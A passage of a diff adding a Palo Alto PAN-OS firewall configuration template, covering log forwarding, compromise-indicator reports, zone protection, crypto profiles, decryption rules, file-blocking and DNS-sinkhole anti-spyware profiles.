+              <action-desc>Email Phishing Wildfire Verdicts</action-desc>
+              <log-type>wildfire</log-type>
+              <filter>(verdict eq phishing)</filter>
+              <send-to-panorama>no</send-to-panorama>
+            </entry>
+            <entry name="Wildfire_Log_Forwarding">
+              <log-type>wildfire</log-type>
+              <filter>All Logs</filter>
+              <send-to-panorama>no</send-to-panorama>
+              <send-syslog>
+                <member>Sample_Syslog_Profile</member>
+              </send-syslog>
+            </entry>
+            <entry name="URL_Log_Forwarding">
+              <log-type>url</log-type>
+              <filter>All Logs</filter>
+              <send-to-panorama>no</send-to-panorama>
+              <send-syslog>
+                <member>Sample_Syslog_Profile</member>
+              </send-syslog>
+            </entry>
+            <entry name="Data_Log_Forwarding">
+              <log-type>data</log-type>
+              <filter>All Logs</filter>
+              <send-to-panorama>no</send-to-panorama>
+              <send-syslog>
+                <member>Sample_Syslog_Profile</member>
+              </send-syslog>
+            </entry>
+            <entry name="GTP_Log_Forwarding">
+              <log-type>gtp</log-type>
+              <filter>All Logs</filter>
+              <send-to-panorama>no</send-to-panorama>
+              <send-syslog>
+                <member>Sample_Syslog_Profile</member>
+              </send-syslog>
+            </entry>
+            <entry name="Tunnel_Log_Forwarding">
+              <log-type>tunnel</log-type>
+              <filter>All Logs</filter>
+              <send-to-panorama>no</send-to-panorama>
+              <send-syslog>
+                <member>Sample_Syslog_Profile</member>
+              </send-syslog>
+            </entry>
+            <entry name="Auth_Log_Forwarding">
+              <log-type>auth</log-type>
+              <filter>All Logs</filter>
+              <send-to-panorama>no</send-to-panorama>
+              <send-syslog>
+                <member>Sample_Syslog_Profile</member>
+              </send-syslog>
+            </entry>
+          </match-list>
+        </entry>
+      </profiles>
+    </log-settings>
+    <reports>
+      <entry name="Host-visit malicious sites plus">
+        <period>last-7-calendar-days</period>
+        <topn>500</topn>
+        <topm>50</topm>
+        <caption>Host-visit malicious sites plus</caption>
+        <frequency>daily</frequency>
+        <query>(category eq command-and-control) or (category eq hacking) or (category eq malware) or (category eq phishing)</query>
+        <type>
+          <url>
+            <sortby>repeatcnt</sortby>
+            <group-by>src</group-by>
+            <aggregate-by>
+              <member>from</member>
+              <member>srcuser</member>
+              <member>category</member>
+              <member>action</member>
+            </aggregate-by>
+            <values>
+              <member>repeatcnt</member>
+            </values>
+          </url>
+        </type>
+      </entry>
+      <entry name="Hosts visit malicious sites">
+        <period>last-7-calendar-days</period>
+        <topn>500</topn>
+        <topm>50</topm>
+        <caption>Hosts visit malicious sites</caption>
+        <frequency>daily</frequency>
+        <query>(category eq command-and-control) or (category eq hacking) or (category eq malware) or (category eq phishing)</query>
+        <type>
+          <url>
+            <sortby>repeatcnt</sortby>
+            <group-by>src</group-by>
+            <aggregate-by>
+              <member>from</member>
+              <member>srcuser</member>
+            </aggregate-by>
+            <values>
+              <member>repeatcnt</member>
+            </values>
+          </url>
+        </type>
+      </entry>
+      <entry name="Hosts visit questionable sites">
+        <period>last-7-calendar-days</period>
+        <topn>500</topn>
+        <topm>50</topm>
+        <caption>Hosts visit questionable sites</caption>
+        <frequency>daily</frequency>
+        <query>(category eq dynamic-dns) and (category eq parked) and (category eq questionable) and (category eq unknown)</query>
+        <type>
+          <url>
+            <sortby>repeatcnt</sortby>
+            <group-by>src</group-by>
+            <aggregate-by>
+              <member>from</member>
+              <member>srcuser</member>
+            </aggregate-by>
+            <values>
+              <member>repeatcnt</member>
+            </values>
+          </url>
+        </type>
+      </entry>
+      <entry name="Host-visit quest sites plus">
+        <period>last-7-calendar-days</period>
+        <topn>500</topn>
+        <topm>50</topm>
+        <caption>Host-visit quest sites plus</caption>
+        <frequency>daily</frequency>
+        <query>(category eq dynamic-dns) and (category eq parked) and (category eq questionable) and (category eq unknown)</query>
+        <description>Detail of hosts visiting questionable URLs</description>
+        <type>
+          <url>
+            <sortby>repeatcnt</sortby>
+            <group-by>src</group-by>
+            <aggregate-by>
+              <member>from</member>
+              <member>srcuser</member>
+              <member>category</member>
+              <member>action</member>
+            </aggregate-by>
+            <values>
+              <member>repeatcnt</member>
+            </values>
+          </url>
+        </type>
+      </entry>
+      <entry name="Wildfire malicious verdicts">
+        <period>last-30-calendar-days</period>
+        <topn>500</topn>
+        <topm>10</topm>
+        <caption>Wildfire malicious verdicts</caption>
+        <frequency>daily</frequency>
+        <query>(app neq smtp) and (category neq benign)</query>
+        <description>Files uploaded or downloaded that were later found to be malicious. This is a summary. Act on real-time email.</description>
+        <type>
+          <wildfire>
+            <sortby>repeatcnt</sortby>
+            <aggregate-by>
+              <member>filedigest</member>
+              <member>container-of-app</member>
+              <member>app</member>
+              <member>category</member>
+              <member>filetype</member>
+              <member>rule</member>
+            </aggregate-by>
+            <values>
+              <member>repeatcnt</member>
+            </values>
+          </wildfire>
+        </type>
+      </entry>
+      <entry name="Wildfire verdicts SMTP">
+        <period>last-30-calendar-days</period>
+        <topn>500</topn>
+        <topm>10</topm>
+        <caption>Wildfire verdicts SMTP</caption>
+        <frequency>daily</frequency>
+        <query>(app eq smtp) and (category neq benign)</query>
+        <description>Links sent from emails found to be malicious. </description>
+        <type>
+          <wildfire>
+            <sortby>repeatcnt</sortby>
+            <aggregate-by>
+              <member>filedigest</member>
+              <member>container-of-app</member>
+              <member>app</member>
+              <member>category</member>
+              <member>filetype</member>
+              <member>rule</member>
+              <member>subject</member>
+              <member>sender</member>
+              <member>recipient</member>
+              <member>misc</member>
+            </aggregate-by>
+          </wildfire>
+        </type>
+      </entry>
+      <entry name="Clients sinkholed">
+        <period>last-30-calendar-days</period>
+        <topn>500</topn>
+        <topm>50</topm>
+        <caption>Clients sinkholed</caption>
+        <query>(rule eq 'DNS Sinkhole Block')</query>
+        <frequency>daily</frequency>
+        <type>
+          <traffic>
+            <sortby>repeatcnt</sortby>
+            <group-by>from</group-by>
+            <aggregate-by>
+              <member>src</member>
+              <member>srcuser</member>
+            </aggregate-by>
+            <values>
+              <member>repeatcnt</member>
+            </values>
+          </traffic>
+        </type>
+      </entry>
+    </reports>
+    <report-group>
+      <entry name="Possible Compromise">
+        <custom-widget>
+          <entry name="1">
+            <custom-report>Clients sinkholed</custom-report>
+          </entry>
+          <entry name="2">
+            <custom-report>Wildfire malicious verdicts</custom-report>
+          </entry>
+          <entry name="3">
+            <custom-report>Wildfire verdicts SMTP</custom-report>
+          </entry>
+          <entry name="4">
+            <custom-report>Hosts visit malicious sites</custom-report>
+          </entry>
+          <entry name="5">
+            <custom-report>Host-visit malicious sites plus</custom-report>
+          </entry>
+          <entry name="6">
+            <custom-report>Hosts visit questionable sites</custom-report>
+          </entry>
+          <entry name="7">
+            <custom-report>Host-visit quest sites plus</custom-report>
+          </entry>
+        </custom-widget>
+        <title-page>yes</title-page>
+        <variable>
+          <entry name="title">
+            <value>Possible Compromise</value>
+          </entry>
+        </variable>
+      </entry>
+    </report-group>
+    <email-scheduler>
+      <entry name="Possbile Compromise">
+        <report-group>Possible Compromise</report-group>
+        <recurring>
+          <disabled/>
+        </recurring>
+        <email-profile>Sample_Email_Profile</email-profile>
+      </entry>
+    </email-scheduler>
+    <content-preview>
+      <application/>
+      <application-type>
+        <category/>
+        <technology/>
+      </application-type>
+    </content-preview>
+  </shared>
+  <devices>
+    <entry name="localhost.localdomain">
+      <network>
+        <interface>
+          <ethernet/>
+        </interface>
+        <profiles>
+          <monitor-profile>
+            <entry name="default">
+              <interval>3</interval>
+              <threshold>5</threshold>
+              <action>wait-recover</action>
+            </entry>
+          </monitor-profile>
+          <zone-protection-profile>
+            <entry name="Recommended_Zone_Protection">
+              <flood>
+                <tcp-syn>
+                  <red>
+                    <alarm-rate>10000</alarm-rate>
+                    <activate-rate>10000</activate-rate>
+                    <maximal-rate>40000</maximal-rate>
+                  </red>
+                  <enable>no</enable>
+                </tcp-syn>
+                <icmp>
+                  <red>
+                    <alarm-rate>10000</alarm-rate>
+                    <activate-rate>10000</activate-rate>
+                    <maximal-rate>40000</maximal-rate>
+                  </red>
+                  <enable>no</enable>
+                </icmp>
+                <icmpv6>
+                  <red>
+                    <alarm-rate>10000</alarm-rate>
+                    <activate-rate>10000</activate-rate>
+                    <maximal-rate>40000</maximal-rate>
+                  </red>
+                  <enable>no</enable>
+                </icmpv6>
+                <other-ip>
+                  <red>
+                    <alarm-rate>10000</alarm-rate>
+                    <activate-rate>10000</activate-rate>
+                    <maximal-rate>40000</maximal-rate>
+                  </red>
+                  <enable>no</enable>
+                </other-ip>
+                <udp>
+                  <red>
+                    <alarm-rate>10000</alarm-rate>
+                    <activate-rate>10000</activate-rate>
+                    <maximal-rate>40000</maximal-rate>
+                  </red>
+                  <enable>no</enable>
+                </udp>
+              </flood>
+              <scan>
+                <entry name="8001">
+                  <action>
+                    <alert/>
+                  </action>
+                  <interval>2</interval>
+                  <threshold>100</threshold>
+                </entry>
+                <entry name="8002">
+                  <action>
+                    <alert/>
+                  </action>
+                  <interval>10</interval>
+                  <threshold>100</threshold>
+                </entry>
+                <entry name="8003">
+                  <action>
+                    <alert/>
+                  </action>
+                  <interval>2</interval>
+                  <threshold>100</threshold>
+                </entry>
+              </scan>
+              <discard-ip-spoof>yes</discard-ip-spoof>
+              <discard-malformed-option>yes</discard-malformed-option>
+              <remove-tcp-timestamp>yes</remove-tcp-timestamp>
+              <strip-tcp-fast-open-and-data>no</strip-tcp-fast-open-and-data>
+              <strip-mptcp-option>global</strip-mptcp-option>
+            </entry>
+          </zone-protection-profile>
+          <interface-management-profile/>
+        </profiles>
+        <ike>
+          <crypto-profiles>
+            <ike-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                  <member>3des</member>
+                </encryption>
+                <hash>
+                  <member>sha1</member>
+                </hash>
+                <dh-group>
+                  <member>group2</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha256</member>
+                </hash>
+                <dh-group>
+                  <member>group19</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <encryption>
+                  <member>aes-256-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha384</member>
+                </hash>
+                <dh-group>
+                  <member>group20</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+            </ike-crypto-profiles>
+            <ipsec-crypto-profiles>
+              <entry name="default">
+                <esp>
+                  <encryption>
+                    <member>aes-128-cbc</member>
+                    <member>3des</member>
+                  </encryption>
+                  <authentication>
+                    <member>sha1</member>
+                  </authentication>
+                </esp>
+                <dh-group>group2</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <esp>
+                  <encryption>
+                    <member>aes-128-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group19</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <esp>
+                  <encryption>
+                    <member>aes-256-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group20</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+            </ipsec-crypto-profiles>
+            <global-protect-app-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <authentication>
+                  <member>sha1</member>
+                </authentication>
+              </entry>
+            </global-protect-app-crypto-profiles>
+          </crypto-profiles>
+        </ike>
+        <qos>
+          <profile>
+            <entry name="default">
+              <class>
+                <entry name="class1">
+                  <priority>real-time</priority>
+                </entry>
+                <entry name="class2">
+                  <priority>high</priority>
+                </entry>
+                <entry name="class3">
+                  <priority>high</priority>
+                </entry>
+                <entry name="class4">
+                  <priority>medium</priority>
+                </entry>
+                <entry name="class5">
+                  <priority>medium</priority>
+                </entry>
+                <entry name="class6">
+                  <priority>low</priority>
+                </entry>
+                <entry name="class7">
+                  <priority>low</priority>
+                </entry>
+                <entry name="class8">
+                  <priority>low</priority>
+                </entry>
+              </class>
+            </entry>
+          </profile>
+        </qos>
+        <virtual-router>
+          <entry name="default">
+            <admin-dists/>
+            <interface/>
+          </entry>
+        </virtual-router>
+      </network>
+      <deviceconfig>
+        <system>
+          <hostname>WebFW1</hostname>
+          <timezone>UTC</timezone>
+          <update-server>updates.paloaltonetworks.com</update-server>
+          <server-verification>yes</server-verification>
+          <dns-setting>
+            <servers>
+              <primary>10.0.0.2</primary>
+              <secondary>10.0.0.2</secondary>
+            </servers>
+          </dns-setting>
+          <login-banner>Gold 1.0 - PANOS 8.0</login-banner>
+          <service>
+            <disable-telnet>yes</disable-telnet>
+            <disable-http>yes</disable-http>
+          </service>
+          <snmp-setting>
+            <access-setting>
+              <version>
+                <v3/>
+              </version>
+            </access-setting>
+          </snmp-setting>
+          <type>
+            <dhcp-client>
+              <send-hostname>yes</send-hostname>
+              <send-client-id>no</send-client-id>
+              <accept-dhcp-hostname>no</accept-dhcp-hostname>
+              <accept-dhcp-domain>no</accept-dhcp-domain>
+            </dhcp-client>
+          </type>
+          <update-schedule>
+            <threats>
+              <recurring>
+                <daily>
+                  <at>00:00</at>
+                  <action>download-and-install</action>
+                </daily>
+                <threshold>48</threshold>
+              </recurring>
+            </threats>
+            <statistics-service>
+              <application-reports>yes</application-reports>
+              <threat-prevention-reports>yes</threat-prevention-reports>
+              <threat-prevention-pcap>yes</threat-prevention-pcap>
+              <threat-prevention-information>yes</threat-prevention-information>
+              <passive-dns-monitoring>yes</passive-dns-monitoring>
+              <url-reports>yes</url-reports>
+              <health-performance-reports>yes</health-performance-reports>
+              <file-identification-reports>yes</file-identification-reports>
+            </statistics-service>
+            <anti-virus>
+              <recurring>
+                <hourly>
+                  <at>3</at>
+                  <action>download-and-install</action>
+                </hourly>
+              </recurring>
+            </anti-virus>
+          </update-schedule>
+        </system>
+        <setting>
+          <config>
+            <rematch>yes</rematch>
+          </config>
+          <management>
+            <hostname-type-in-syslog>FQDN</hostname-type-in-syslog>
+            <initcfg>
+              <type>
+                <dhcp-client>
+                  <send-hostname>yes</send-hostname>
+                  <send-client-id>no</send-client-id>
+                  <accept-dhcp-hostname>no</accept-dhcp-hostname>
+                  <accept-dhcp-domain>no</accept-dhcp-domain>
+                </dhcp-client>
+              </type>
+              <public-key>c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDR3ZDNHZmYk1JbXVSSTlnNGx5SkJRQ0NNSUFjZk0wemVMM2VFM0REdlRkRmYrYzZLOHVJUlRwUk01MHo0TVEwTXd1TEo0Rk1iclQ5ZVRsaEZaZitYcjVBZzJ2R2xIRE9zcEEwSWtmbzZXaTBwYnQ1d1hYV1YwOCs1Tk9GRkpXNm13YThvWUV3RUtHZWlDTEJnRWMyRTgzaXo3alNiNkRST3hXakxDOWVkZmR0ZmNTSzhlNW1kbmRZUkVMK3ZoaSt1QUZac0RpTEhMWGNpeFlaU0xML0xvcmIzK2hnOVdsejQwR0IwMmVsRk1Oc3hJSFdzVUQxMDFVelJzWWFxYWVVWjRuNDlxOVhtc1ZxazVkbHRhcTdtYitWNTZqaVBvVG1wZGNjNjZycGtqWFNjK2NFWGMzaitNbUFRd1F5RkFjbDI2dzlGb3pvUmo4MmY0REx3SncwaEIgamZyYW5rbGluMg==</public-key>
+              <dns-primary>8.8.8.8</dns-primary>
+              <dns-secondary>8.8.4.4</dns-secondary>
+            </initcfg>
+          </management>
+          <ctd>
+            <strip-x-fwd-for>yes</strip-x-fwd-for>
+            <x-forwarded-for>yes</x-forwarded-for>
+          </ctd>
+          <wildfire>
+            <file-size-limit>
+              <entry name="pe">
+                <size-limit>10</size-limit>
+              </entry>
+              <entry name="apk">
+                <size-limit>30</size-limit>
+              </entry>
+              <entry name="pdf">
+                <size-limit>1000</size-limit>
+              </entry>
+              <entry name="ms-office">
+                <size-limit>2000</size-limit>
+              </entry>
+              <entry name="jar">
+                <size-limit>5</size-limit>
+              </entry>
+              <entry name="flash">
+                <size-limit>5</size-limit>
+              </entry>
+              <entry name="MacOSX">
+                <size-limit>1</size-limit>
+              </entry>
+              <entry name="archive">
+                <size-limit>10</size-limit>
+              </entry>
+              <entry name="linux">
+                <size-limit>2</size-limit>
+              </entry>
+            </file-size-limit>
+            <report-benign-file>yes</report-benign-file>
+            <report-grayware-file>yes</report-grayware-file>
+          </wildfire>
+          <application>
+            <notify-user>yes</notify-user>
+          </application>
+          <logging>
+            <log-suppression>no</log-suppression>
+          </logging>
+        </setting>
+      </deviceconfig>
+      <vsys>
+        <entry name="vsys1">
+          <application>
+            <entry name="elb-healthchecker">
+              <signature>
+                <entry name="elb-healthchecker-signature">
+                  <and-condition>
+                    <entry name="And Condition 1">
+                      <or-condition>
+                        <entry name="Or Condition 1">
+                          <operator>
+                            <pattern-match>
+                              <pattern>ELB-HealthChecker/2.0</pattern>
+                              <context>http-req-headers</context>
+                            </pattern-match>
+                          </operator>
+                        </entry>
+                      </or-condition>
+                    </entry>
+                  </and-condition>
+                  <scope>session</scope>
+                  <order-free>no</order-free>
+                </entry>
+              </signature>
+              <subcategory>infrastructure</subcategory>
+              <category>networking</category>
+              <technology>browser-based</technology>
+              <risk>1</risk>
+            </entry>
+          </application>
+          <application-group/>
+          <zone/>
+          <service/>
+          <service-group/>
+          <schedule/>
+          <rulebase>
+            <default-security-rules>
+              <rules>
+                <entry name="intrazone-default">
+                  <action>allow</action>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                  <profile-setting>
+                    <group>
+                      <member>Inbound</member>
+                    </group>
+                  </profile-setting>
+                  <log-setting>default</log-setting>
+                </entry>
+                <entry name="interzone-default">
+                  <action>deny</action>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                  <log-setting>default</log-setting>
+                </entry>
+              </rules>
+            </default-security-rules>
+            <security>
+              <rules/>
+            </security>
+            <decryption>
+              <rules>
+                <entry name="NO-Decrypt URL Categories">
+                  <category>
+                    <member>financial-services</member>
+                    <member>government</member>
+                    <member>health-and-medicine</member>
+                    <member>Custom-No-Decrypt</member>
+                  </category>
+                  <service>
+                    <member>any</member>
+                  </service>
+                  <type>
+                    <ssl-forward-proxy/>
+                  </type>
+                  <from>
+                    <member>any</member>
+                  </from>
+                  <to>
+                    <member>any</member>
+                  </to>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <profile>Recommended_Decryption_Profile</profile>
+                  <action>no-decrypt</action>
+                  <disabled>yes</disabled>
+                  <description>This rule does not do Decryption.  This rule is validating SSL Protocol Communications.</description>
+                </entry>
+                <entry name="NO-Decrypt Rule">
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <service>
+                    <member>any</member>
+                  </service>
+                  <type>
+                    <ssl-forward-proxy/>
+                  </type>
+                  <from>
+                    <member>any</member>
+                  </from>
+                  <to>
+                    <member>any</member>
+                  </to>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <profile>Recommended_Decryption_Profile</profile>
+                  <action>no-decrypt</action>
+                  <description>This rule does not do Decryption.  This rule is validating SSL Protocol Communications.</description>
+                </entry>
+              </rules>
+            </decryption>
+            <nat>
+              <rules/>
+            </nat>
+          </rulebase>
+          <tag>
+            <entry name="Outbound">
+              <comments>Outbound to the Internet</comments>
+            </entry>
+            <entry name="Inbound">
+              <comments>Inbound from the Internet</comments>
+            </entry>
+            <entry name="Internal">
+              <comments>Internal to Internal</comments>
+            </entry>
+          </tag>
+          <address>
+            <entry name="Sinkhole-IPv6">
+              <ip-netmask>2600:5200::1</ip-netmask>
+            </entry>
+            <entry name="fw-untrust">
+              <ip-netmask>10.0.1.10</ip-netmask>
+            </entry>
+          </address>
+          <external-list>
+            <entry name="Team Cymru Bogons IPv4">
+              <type>
+                <ip>
+                  <recurring>
+                    <hourly/>
+                  </recurring>
+                  <url>http://www.team-cymru.org/Services/Bogons/fullbogons-ipv4.txt</url>
+                  <description>IPv4 addresses that should not be routed across the Internet. Either reserved IP address space or unassigned and may be used for malicious purposes. More information: http://www.team-cymru.com/bogon-reference.html</description>
+                </ip>
+              </type>
+            </entry>
+            <entry name="Team Cymru Bogons IPv6">
+              <type>
+                <ip>
+                  <recurring>
+                    <hourly/>
+                  </recurring>
+                  <url>http://www.team-cymru.org/Services/Bogons/fullbogons-ipv6.txt</url>
+                  <description>IPv6 addresses that should not be routed across the Internet. Either reserved IP address space or unassigned and may be used for malicious purposes. More information: http://www.team-cymru.com/bogon-reference.html</description>
+                </ip>
+              </type>
+            </entry>
+          </external-list>
+          <profiles>
+            <custom-url-category>
+              <entry name="Black-List"/>
+              <entry name="White-List"/>
+              <entry name="Custom-No-Decrypt"/>
+            </custom-url-category>
+            <decryption>
+              <entry name="Recommended_Decryption_Profile">
+                <ssl-forward-proxy>
+                  <block-expired-certificate>yes</block-expired-certificate>
+                  <block-untrusted-issuer>yes</block-untrusted-issuer>
+                  <block-unknown-cert>yes</block-unknown-cert>
+                  <block-timeout-cert>yes</block-timeout-cert>
+                  <block-unsupported-version>yes</block-unsupported-version>
+                  <block-unsupported-cipher>yes</block-unsupported-cipher>
+                </ssl-forward-proxy>
+                <ssl-no-proxy>
+                  <block-expired-certificate>yes</block-expired-certificate>
+                  <block-untrusted-issuer>yes</block-untrusted-issuer>
+                </ssl-no-proxy>
+                <ssl-inbound-proxy>
+                  <block-unsupported-version>no</block-unsupported-version>
+                  <block-unsupported-cipher>no</block-unsupported-cipher>
+                </ssl-inbound-proxy>
+                <ssh-proxy>
+                  <block-unsupported-version>yes</block-unsupported-version>
+                  <block-unsupported-alg>yes</block-unsupported-alg>
+                </ssh-proxy>
+                <ssl-protocol-settings>
+                  <min-version>tls1-2</min-version>
+                  <keyxchg-algo-rsa>no</keyxchg-algo-rsa>
+                  <enc-algo-3des>no</enc-algo-3des>
+                  <enc-algo-rc4>no</enc-algo-rc4>
+                  <auth-algo-sha1>no</auth-algo-sha1>
+                </ssl-protocol-settings>
+              </entry>
+            </decryption>
+            <file-blocking>
+              <entry name="Outbound-FB">
+                <rules>
+                  <entry name="Alert-All">
+                    <application>
+                      <member>any</member>
+                    </application>
+                    <file-type>
+                      <member>any</member>
+                    </file-type>
+                    <direction>both</direction>
+                    <action>alert</action>
+                  </entry>
+                  <entry name="Block">
+                    <application>
+                      <member>any</member>
+                    </application>
+                    <file-type>
+                      <member>7z</member>
+                      <member>bat</member>
+                      <member>chm</member>
+                      <member>class</member>
+                      <member>cpl</member>
+                      <member>dll</member>
+                      <member>hlp</member>
+                      <member>hta</member>
+                      <member>jar</member>
+                      <member>ocx</member>
+                      <member>pif</member>
+                      <member>scr</member>
+                      <member>torrent</member>
+                      <member>vbe</member>
+                      <member>wsf</member>
+                    </file-type>
+                    <direction>both</direction>
+                    <action>block</action>
+                  </entry>
+                </rules>
+              </entry>
+              <entry name="Inbound-FB">
+                <rules>
+                  <entry name="Alert-All">
+                    <application>
+                      <member>any</member>
+                    </application>
+                    <file-type>
+                      <member>any</member>
+                    </file-type>
+                    <direction>both</direction>
+                    <action>alert</action>
+                  </entry>
+                  <entry name="Block">
+                    <application>
+                      <member>any</member>
+                    </application>
+                    <file-type>
+                      <member>7z</member>
+                      <member>bat</member>
+                      <member>chm</member>
+                      <member>class</member>
+                      <member>cpl</member>
+                      <member>dll</member>
+                      <member>hlp</member>
+                      <member>hta</member>
+                      <member>jar</member>
+                      <member>ocx</member>
+                      <member>pif</member>
+                      <member>scr</member>
+                      <member>torrent</member>
+                      <member>vbe</member>
+                      <member>wsf</member>
+                    </file-type>
+                    <direction>both</direction>
+                    <action>block</action>
+                  </entry>
+                </rules>
+              </entry>
+              <entry name="Internal-FB">
+                <rules>
+                  <entry name="Alert-All">
+                    <application>
+                      <member>any</member>
+                    </application>
+                    <file-type>
+                      <member>any</member>
+                    </file-type>
+                    <direction>both</direction>
+                    <action>alert</action>
+                  </entry>
+                  <entry name="Block">
+                    <application>
+                      <member>any</member>
+                    </application>
+                    <file-type>
+                      <member>7z</member>
+                      <member>bat</member>
+                      <member>chm</member>
+                      <member>class</member>
+                      <member>cpl</member>
+                      <member>hlp</member>
+                      <member>hta</member>
+                      <member>jar</member>
+                      <member>ocx</member>
+                      <member>pif</member>
+                      <member>scr</member>
+                      <member>torrent</member>
+                      <member>vbe</member>
+                      <member>wsf</member>
+                    </file-type>
+                    <direction>both</direction>
+                    <action>block</action>
+                  </entry>
+                </rules>
+              </entry>
+              <entry name="Alert-Only-FB">
+                <rules>
+                  <entry name="Alert-Only">
+                    <application>
+                      <member>any</member>
+                    </application>
+                    <file-type>
+                      <member>any</member>
+                    </file-type>
+                    <direction>both</direction>
+                    <action>alert</action>
+                  </entry>
+                </rules>
+              </entry>
+              <entry name="Cloud-Recommended">
+                <rules>
+                  <entry name="Alert">
+                    <application>
+                      <member>any</member>
+                    </application>
+                    <file-type>
+                      <member>any</member>
+                    </file-type>
+                    <direction>both</direction>
+                    <action>alert</action>
+                  </entry>
+                </rules>
+              </entry>
+            </file-blocking>
+            <spyware>
+              <entry name="Outbound-AS">
+                <botnet-domains>
+                  <lists>
+                    <entry name="default-paloalto-dns">
+                      <action>
+                        <sinkhole/>
+                      </action>
+                    </entry>
+                  </lists>
+                  <sinkhole>
+                    <ipv4-address>72.5.65.111</ipv4-address>
+                    <ipv6-address>2600:5200::1</ipv6-address>
+                  </sinkhole>
+                  <packet-capture>single-packet</packet-capture>
+                </botnet-domains>
+                <rules>
+                  <entry name="Block-Critical-High-Medium">
+                    <action>
+                      <reset-both/>
+                    </action>
+                    <severity>
+                      <member>high</member>
+                      <member>critical</member>
+                      <member>medium</member>
+                    </severity>
+                    <threat-name>any</threat-name>
+                    <category>any</category>
+                    <packet-capture>single-packet</packet-capture>
+                  </entry>
+                  <entry name="Default-Low-Info">
+                    <action>
+                      <default/>
+                    </action>
+                    <severity>
+                      <member>low</member>
+                      <member>informational</member>
+                    </severity>
+                    <threat-name>any</threat-name>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                </rules>
+              </entry>
+              <entry name="Inbound-AS">
+                <botnet-domains>
+                  <lists>
+                    <entry name="default-paloalto-dns">
+                      <action>
+                        <sinkhole/>
+                      </action>
+                    </entry>
+                  </lists>
+                  <sinkhole>
+                    <ipv4-address>72.5.65.111</ipv4-address>
+                    <ipv6-address>2600:5200::1</ipv6-address>
+                  </sinkhole>
+                  <packet-capture>single-packet</packet-capture>
+                </botnet-domains>
+                <rules>
+                  <entry name="Block-Critical-High-Medium">
+                    <action>
+                      <reset-both/>
+                    </action>
+                    <severity>
+                      <member>high</member>
+                      <member>critical</member>
+                      <member>medium</member>
+                    </severity>
+                    <threat-name>any</threat-name>
+                    <category>any</category>
+                    <packet-capture>single-packet</packet-capture>
+                  </entry>
+                  <entry name="Default-Low-Info">
+                    <action>
+                      <default/>
+                    </action>
+                    <severity>
+                      <member>low</member>
+                      <member>informational</member>
+                    </severity>
+                    <threat-name>any</threat-name>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                </rules>
+              </entry>
+              <entry name="Internal-AS">
+                <botnet-domains>
+                  <lists>
+                    <entry name="default-paloalto-dns">
+                      <action>
+                        <sinkhole/>
+                      </action>
+                    </entry>
+                  </lists>
+                  <sinkhole>
+                    <ipv4-address>72.5.65.111</ipv4-address>
+                    <ipv6-address>2600:5200::1</ipv6-address>
+                  </sinkhole>
+                  <packet-capture>single-packet</packet-capture>
+                </botnet-domains>
+                <rules>
+                  <entry name="Block-Critical-High">
+                    <action>
+                      <reset-both/>
+                    </action>
+                    <severity>
+                      <member>high</member>
+                      <member>critical</member>
+                    </severity>
+                    <threat-name>any</threat-name>
+                    <category>any</category>
+                    <packet-capture>single-packet</packet-capture>
+                  </entry>
+                  <entry name="Default-Medium-Low-Info">
+                    <action>
+                      <default/>
+                    </action>
+                    <severity>
+                      <member>low</member>
+                      <member>informational</member>
+                      <member>medium</member>
+                    </severity>
+                    <threat-name>any</threat-name>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                </rules>
+              </entry>
+              <entry name="Alert-Only-AS">
+                <botnet-domains>
+                  <lists>
+                    <entry name="default-paloalto-dns">
+                      <action>
+                        <alert/>
+                      </action>
+                    </entry>
+                  </lists>
+                  <sinkhole>
+                    <ipv6-address>2600:5200::1</ipv6-address>
+                  </sinkhole>
+                  <packet-capture>disable</packet-capture>
+                </botnet-domains>
+                <rules>
+                  <entry name="Alert-All">
+                    <action>
+                      <alert/>
+                    </action>
+                    <severity>
+                      <member>any</member>
+                    </severity>
+                    <threat-name>any</threat-name>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                </rules>
+              </entry>
+              <entry name="Exception-AS">
+                <botnet-domains>
+                  <lists>
+                    <entry name="default-paloalto-dns">
+                      <action>
+                        <sinkhole/>
+                      </action>
+                    </entry>
+                  </lists>
+                  <sinkhole>
+                    <ipv4-address>72.5.65.111</ipv4-address>
+                    <ipv6-address>2600:5200::1</ipv6-address>
+                  </sinkhole>
+                  <packet-capture>single-packet</packet-capture>
+                </botnet-domains>
+              </entry>
+              <entry name="Cloud-Recommended">
+                <botnet-domains>
+                  <lists>
+                    <entry name="default-paloalto-dns">
+                      <action>
+                        <sinkhole/>
+                      </action>
+                    </entry>
